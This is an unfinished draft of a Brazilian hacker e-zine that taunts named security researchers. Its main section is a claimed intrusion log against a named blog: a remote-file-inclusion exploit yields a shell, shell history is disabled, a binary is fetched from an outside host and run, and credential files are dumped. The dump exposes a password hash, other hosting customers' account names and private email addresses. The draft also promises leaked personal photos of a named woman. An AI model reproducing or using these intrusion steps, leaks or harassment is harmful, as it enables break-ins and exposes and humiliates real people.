#!/bin/sh ############################################################################# ## ## ## PR0J3KT M4YH3M BR4Z1L ## ## rm -rf /whitehats ## ## take back the underground ## ## ## ## APR3S3NT4 ## ## i sh0t the white hat eDiÇãO 5 ## ## eDiÇãO eSpeCiAl FiM do mUnDO ## ## ## ############################################################################# # # # MMNMM~ # # 8MM$ZZZZNMM # # 8MMOZZZZMMM # # 8MMZZ$ MMM +MM: # # 8MMZZZ MMM +MM: # # MMMMMMMNO$$ZZZ 8MMZZZMMNMMMMMMMD$$MMM # # 88D77$NN777$$$77$ZZZZZ$$ZZZZZZZZZZZZZZZZZZZ$ZZNNN# # DDD$$OMM7$$$$$$$ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZMMM# # NMMZZZZZZZZZZZZZZZZZZZMM: MMM +MM MMZ NMM # # NMMZZZZZZZOZZZZZZZZZZ$MM, MMM =MM MMZ NMN # # ,DDO$$ZZZZZZ$$ZZODDDZZZZZMMN DMM MN8 MMM +MM: # # ,DDO$$OOOZZ$$$ZZZ888ZZZZZNNN I77 $$I OOO ~ZZ, # # ,MM8ZZDDDZZZZZZOZZZZZZZZONMN # # ZDD$$$ZZZZZ$$7ZZODDZZZ$$$ZZZZOMMN i sh0t # # $DD$$$OZZZZ$$$ZZODDZZZ$$$ZZZZZMMN t3h wh1t3h4t # # OMMZZODDOZZZZZZZZZZZZZZZZZZZZZMMN # # ~::,::OMMZZZDD8ZZZZ$ZZZZZZZZZZZZZZZZMMN ed1c40 5 # # :DDD$$ZOZZZZ$$ZZZDDDZZ$$$ZZODDDZZZZZMMN # # ~NNNZZO8DZZZZZZZZOZZZZ$ZZZZZZZOZZZZZNNM # # ~MMMOZ8DDZZZZZZZOZZOZZZZZZZZZZZZZZZZMMM # # ?DD$ZZOZZZZ$$$OZODDOZZ$$$ZZODD$ZZ$$$ZZZZZZZZMM MMM MM , MMO NMM # # ~~~?DD7$$OZZZZ$$$OZZDDOZZ$$$ZZZDDZZZ$$$ZZZZZZZZNM MMM MM MMO NMM # # :MMNMMZOODDDOZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZNMM MMO MMM +MM: MMM# #ZZO8O88$ZZOOOZZODDZZZZZZZZ$$$$$$$$$$$DDDZZZZZ$$$$$OOO+++88Z++888++I8O?++MMM# #MM$Z$$$$$$$$$Z$DMMZZZZZZ$$$$$$$$$$$$$MMMZZZZZ$$$$$$$$$$$$$$$$$$$$$$$$$$$MMM# # MNNDDDDDDDDDDNMNZZZZZODDDDDDDDDDDDDMMMZZZZZDDDDDDDDDDDMMNNMNMMMNNMMNMN # # NNNDDDDDDD8DDNNNZZZOZODDDDDDDDDDDDDMNMOZOZZDD8DDDDDDD8NNNMNNMMMMNMMNNN # # MMMMMI MMMMM MMMMM DMMMMM # # MMMMMI MMMMM MMMMM DMMMMM # # # # # ############################################################################# #...........................................................................# ............................................................................# ## <*> ish0tthewhitehat.istwh (siTe of1cial) ## ## ## ## mirrorz ## ## <*> exploit-db.com/docs/istwh/ ## ## <*> packetstormsecurity.org/mag/istwh/ ## ## <*> blog.corujadeti.com.br/allicon/istwh ## ## <*> oys.com.br/meupaucresca/istwh ## ## <*> bhack.com.br/istwh ## ## <*> websecforum.com.br/istwh ## ## <*> ashack.com.br/info/istwh ## ## <*> desafiohacker.com.br/istwh ## ## <*> defhack.com.br/istwh ## ## ## ## ## ## |*| ish0tthewhitehat@gmail.com |*| ## ## ## ############################################################################# ### ### ## [-*-] INiTIaLIZiNG ATTAcK VeCTORs ## ## [-*-] BYPaSSING SSH ENCRYPTIoN ## ## [-*-] LetZ GeT ST4Rt3d!!!!!! ## ### ### #---------------------------------------------------------------------------# # ; eQu1p3 3d1t0r14l ; # # `----------------------' # # # # j3r3m14s j0s3 -> 0 sc4nn3r qu3m BuT0 p4h n01s b3b3r # # sys10g m4rl3y -> n0 l0gz n0 cr1m3z # # th3 BSd t3rr0r1sT -> 3u qu3r0 m41s e qu3 meU p4u cR3sc4 # # f4us7o c0d3loko -> 0 l0c0 m3u, s3 L1g4 n3ss4 f3R4 # # c4p1t40 n4S-c1um3nt0 -> p3D3 pr4 s4iR, wh1t3h4t v4g4bUnd0 # # # #---------------------------------------------------------------------------# #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# # # # "Yes, I am a criminal. My crime is that of curiosity. My crime is that # # of judging people by what they say and think, not what they look like. # # My crime is that of outsmarting you, something that you will never # # forgive me for." # # # #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# da w4r 0n da n3t will n3v3r d1e. da int3rn3t enjoyz 0ur w4r, it ph33dz 0ff it. w3 d0 it ph0r da thr1ll. we d0 1t ph0r the luv. th0u sh411 truzt n0 0n3. ############################################################################# =-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=] INTRO [=-=- =-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-= ############################################################################# 1; intro 2; corujito r3l04d3d 3; LV architecture 4; 0day extravaganza 5; p4ppar4zz1 h4ck3r: carol (b0zz4) l3aked p1cs 6; pwnie awards braSil 7; outr0 ############################################################################# ----------------------------------------------------------------------------------------- 1; intro ----------------------------------------------------------------------------------------- \ \ |\ /| Entao voce trabalha com seguranca? /'| ,' // Conte-nos mais sobre aquele Blog ,'..`/ que voce roda em Wordpress... / '/ _...._.---._ /: ,' .' ,--. ,--. \ ,' , | /... /...| |,..._ ,' / _..---------..__ \.\_O_/ O / ' \ .' _, / .---..._ ,-' __.-.....__ '- ___.-----._'---' ,' | |-`' ( | `--..,'_,-'' '. `''"-._( .-.'.--. _.' / | \ | ,.__ /,' | | \ \ | / | / ,,' __ / | .`. / .' _)--..' | | '\ \` ..--:` _.--' \ | .' .-.__ | |,-' _.-\ | | | |`\''''''''_.-' ,' ( \ ,-`''-- =--::| \-'| | | | | | `'.....-' .,:-' | \ `. , / / '`. | | | | | | | | \__.-` `.. \ \ '. / / / '| | | [ | | | | , '._ | | `. / | .--------' `-. | ' | | | |,L______ `--.. \ ``. | \ |-^---''". | | .' |.' ``-..._ \ `.-..\.__...---....,'-.....--'`'"-........_____|.. `' `'`--..../ n0v1d4d3s d4 5a 3d1c4o: c0mpr4m0s n0ss0 TLD pr0pr10 c0m a d0aca0 d3 5.000k d0l4r3s d0 c0ruj1t0 - ish0tthewhitehat.istwh pub1ic40 d3 0d4yz de p3squ1s4ad0r3s r3n0m4d0s d4 c0mun1d4d3 br4aSil3ir4 pwni3 4w4rds v3rs40 tup1n1qu1m, c0m o anch1ses no c0m1t3 org4n1z4d0r em41l p3ss041 d4 c4r01 (b0zz4) l3ak3d c0m f0tOs p1C4nt3s xxxxx (ja ta pronto, depois vou colar o resto do intro, trocar ordem) ----------------------------------------------------------------------------------------- 2; corujito r3l04d3d ----------------------------------------------------------------------------------------- xxx umad:~/pentest/cusom/# ./l1c34n4 -h blog.corujadeti.com.br/xmlrpc.php -p 80 -v6 -rfi=list.txt [+] l1c34n4 xplt - priv8 priv8 priv8 [+] [+] target: 2804:10:5::89:144 [+] [+] nginx Port: 80 [+] [+] rfi list: list.txt [+] [+] finding offset... [+] [+] testing for rfi [+] [+] g0tsh3ll! [+] sh-3.3$ export HISTFILE=/dev/null sh-3.3$ echo 3u qu3r0 m4is eh qu3 m3u p4u cr3sc4 3u qu3r0 m4is eh qu3 m3u p4u cr3sc4 sh-3.3$ whoami corujadeti sh-3.3$ id uid=724(corujadeti) gid=725(corujadeti) groups=504(tar),725(corujadeti) sh-3.3$ env PHPRC=/usr/local/fastcgi/php.ini/php.corujadeti.ini USER=root FCGI_WEB_SERVER_ADDRS=127.0.0.1 PHP_FCGI_CHILDREN=10 PATH=/usr/bin:/bin PWD=/home/corujadeti/www/blog/ SHLVL=1 PHP_FCGI_MAX_REQUESTS=10000 _=/usr/bin/env sh-3.3$ df -ah Filesystem Size Used Avail Use% Mounted on /dev/sda1 35G 19G 15G 56% / proc 0 0 0 - /proc sysfs 0 0 0 - /sys devpts 0 0 0 - /dev/pts /dev/sda3 11G 529M 11G 5% /var none 0 0 0 - /proc/sys/fs/binfmt_misc tmpfs 1.0G 77M 948M 8% /tmp /dev/sdb1 250G 242G 8.1G 97% /home tmpfs 1.0G 172M 853M 17% /home/logs sh-3.3$ uname -an Linux web331.kinghost.net 2.6.37 #1 SMP Tue Jan 25 13:31:03 BRST 2011 x86_64 x86_64 x86_64 GNU/Linux // m0m3nt0 j4ilbr3ak sh-3.3$ wget http://netclass.oys.com.br/dadinho --12:11:34-- http://netclass.oys.com.br/dadinho Resolving netclass.oys.com.br... 91.121.96.193 Connecting to netclass.oys.com.br|91.121.96.193|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4921 (4.8K) [text/plain] Saving to: `dadinho' sh-3.3$ chmod +x dadinho sh-3.3$ ./dadinho [+] echo "dadinho eh o caralho" [+] tr dadinho joao_pequeno [+] mv /bangu/joao_pequeno /home/joao_pequeno [-] invalid permissions, trying alternative method [+] mail michaelscofield@prisonbreak.com < escape [+] successful jailbreak! [+] g0tr00t sh-3.3# cat /etc/shadow | grep corujadeti corujadeti:$1$abcde$ppjcWUbkHyesBXgD5e12w/:15333:0:99999:7::: sh-3.3# cat /etc/passwd | grep corujadeti corujadeti:x:724:725::/home/corujadeti:/bin/bash sh-3.3# cat /etc/group | grep corujadeti tar:x:504:videoclubofsex,sabia,guiadeautopecas,chutimetro,provider, megapremiumbr,aprenderemead,redcon,x-flog,nacaojovemmineiros,ponoticias, agrorural,pibpin,curt,rockup,cwkweb,ateliercosturacurso,coelhinhasluxo, pccareinfo,rccrc,corujadeti,infogameslitoral,clinicafonoaudiologica, marciodias,saomarcos corujadeti:x:725: sh-3.3# cat /var/tmp/.historico.bloqueado 15/06/2012 09:17 de [wordpress@blog.corujadeti.com.br] para [corujadeti@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo 15/06/2012 09:47 de [joao.mt.2005@gmail.com] para [pedrotaques@senador.gov.br] em [/home/pedrotaquesmt/www/form_contato] por [nobody] ~ pedrotaquesmt multiplo 15/06/2012 11:18 de [migsgfe@gmail.com] para [pedrotaques@senador.gov.br] em [/home/pedrotaquesmt/www/form_contato] por [nobody] ~ pedrotaquesmt multiplo 15/06/2012 11:29 de [robertocesar.direito@hotmail.com] para [pedrotaques@senador.gov.br] em [/home/pedrotaquesmt/www/form_contato] por [nobody] ~ pedrotaquesmt multiplo 15/06/2012 11:54 de [wordpress@blog.corujadeti.com.br] para [corujadeti@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo 15/06/2012 12:05 de [wordpress@blog.corujadeti.com.br] para [corujadeti@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo 15/06/2012 12:38 de [wordpress@blog.corujadeti.com.br] para [corujadeti@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo 15/06/2012 12:53 de [gustcol@gmail.com] para [gustcol@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo xxxxx ----------------------------------------------------------------------------------------- 3; LV architecture ----------------------------------------------------------------------------------------- xxxxx colar logs petrobras oys, ja conseguiu root ou ta soh com o shell do moodle? ----------------------------------------------------------------------------------------- 4; 0day extravaganza ----------------------------------------------------------------------------------------- xxxxx esperar keynote acabar, nao esquecer de passar no banheiro (foto) ----------------------------------------------------------------------------------------- 5; p4ppar4zz1 h4ck3r: carol (b0zz4) l3aked p1cs ----------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------- 6; pwnie awards braSil ----------------------------------------------------------------------------------------- > m31h0r r3sp0ns1b13 d1scl0sur3 http://seclists.org/fulldisclosure/2012/Feb/264 BSDaemon, Conviso & Kousuke Ebihara > m3lh0r d1scuss40 n0 tw1773r jczucco x gustcol jmmrabelo x lv architecture > m3lh0r p4l3str4 n40 ac31t4 mphx2 > m3lh0r s3nh4 de CISSP n0 linkedin xxx ACABA DE ESCREVER LOGO PESTE ----------------------------------------------------------------------------------------- 7; outr0 ----------------------------------------------------------------------------------------- xxx ----------------------------------------------------- | C0nTr1bu4m p4r4 0 ca0s ish0tthewhitehat@gmail.com | -----------------------------------------------------